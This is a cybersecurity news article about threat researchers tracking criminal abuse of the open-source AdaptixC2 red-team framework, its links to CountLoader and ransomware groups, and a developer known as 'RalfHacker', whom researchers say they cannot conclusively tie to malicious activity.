Threat researchers with cybersecurity firm Silent Push are linking bad actors with heavy ties to the Russian underworld to the abuse of AdaptixC2, a free open source tool commonly used by red teams to assess the security of organizations.

AdaptixC2, which is available on GitHub, is the latest in a growing list of open and ethical security-testing tools used by security teams to simulate attacks that threat groups have also adopted for their malicious operations. Researchers from Silent Push and other cybersecurity companies have been tracking the growing abuse of the tool in ransomware and other campaigns this year.

Silent Push last month reported detecting a new malware loader called CountLoader that is associated with Russian ransomware gangs and was observed dropping several malware agents, including AdaptixC2 and Cobalt Strike, another legitimate red-teaming tool that for years has been used by bad actors in campaigns.

At the time, the researchers said CountLoader was being used by either an initial access broker or a ransomware affiliate that has ties with high-profile ransomware groups LockBit, BlackBasta, and Qilin. The AdaptixC2 sever is written in Golang, which is popular among bad actors for its flexibility. The GUI client is written in C++ and QT, enabling it to be used on Linux, Windows, and macOS systems.

Signatures Led to ‘RalfHacker’

In the wake of the CountLoader investigation, Silent Push created signatures to detect AdaptixC2. Researchers have since found that a person that goes by the handle “RalfHacker” has made the most changes to the AdaptixC2 Framework repository in GitHub. Following that lead, they found that RalfHacker describes himself as a penetration tester, red team operator, and malware developer.

Email addresses link RalfHacker to a known hacking forum.

“A Telegram account then led us to a large Telegram group, named after “Ralf Hacker,” advertising the v0.6 update to AdaptixC2 with a pinned message in Russian containing hashtags related to Active Directory and (roughly machine-translated) APT & ATM materials/resources,” the researchers wrote.

They noted the most of RalfHacker’s announcements are written in Russian, which aligns with the strong Russian ties the researchers found while investigating CountLoader, though they cautioned that by itself is not a definitive link.

‘Based on the information we have available, there is insufficient evidence for us to conclusively determine the extent of RalfHacker’s involvement in malicious activity tied to AdaptixC2 or CountLoader at this time,” they wrote. “However, threat actors often mask their cyber criminal activities under the guise of ‘red teaming, or ethical hacking, when communicating publicly with other threat actors. RalfHacker’s own page aligns with this practice, featuring the brazen ‘maldev’ advertisement.”

Keeping an Eye on AdaptixC2

Other threat intelligence teams also have been tracking the abuse of AdaptixC2. A DFIR report in August found that AdaptixC2 was being used by an affiliate of the Akira ransomware group, and researchers with Palo Alto Networks’ Unit 42 team a month later wrote that they’d observed the red-teaming tool being used in May to infect systems through such scenarios as fake help desk calls and an AI-generated PowerShell script.

“Our telemetry and threat intelligence show that AdaptixC2 is becoming more common,” they wrote. “We continue to identify new AdaptixC2 servers, suggesting that more threat actors are adopting this framework as part of their attack toolkit.”

Earlier this month, Kaspersky’s Securelist team found that AdaptixC2 was also becoming available through the NPM software registry. They wrote that “threat actors are increasingly exploiting the trusted open-source supply chain to distribute post-exploitation framework agents and other forms of malware. Users and organizations involved in development or using open-source software from ecosystems like npm in their products are susceptible to this threat type.”

Bad Actors and Legitimate Tools

Trend Micro researchers last year outlined the growing trend of bad actors abusing legitimate ethical security tools in their operations.

“The integration of red teaming techniques into the cybersecurity strategy playbook has been an important step for organizations to enhance their defenses by allowing them to identify potential security gaps via simulated adversarial attacks,” they wrote. “However, the dual-use nature of these tools also poses risks, as they can be repurposed by malicious actors for nefarious purposes.”

The researchers noted that AI and machine learning can be used to better detect and respond to threats posed by the abuse of open tools in repositories, adding that they can reduce analysis time and help prioritize projects, which leads to faster and more effective response.

“It is essential for red teaming methodologies to continuously evolve in tandem with proactive detection and ethical considerations,” they wrote. “Shifting from a reactive approach – where tools are addressed as they become popular among cybercriminals – to a proactive stance that involves constant monitoring for emerging and high-risk tools will allow organizations to protect themselves better from the risks posed by cyber threats.”

In report, Trend Micro researchers took a deeper dive into cybercriminals’ use of such technologies and methodologies for managing the threat.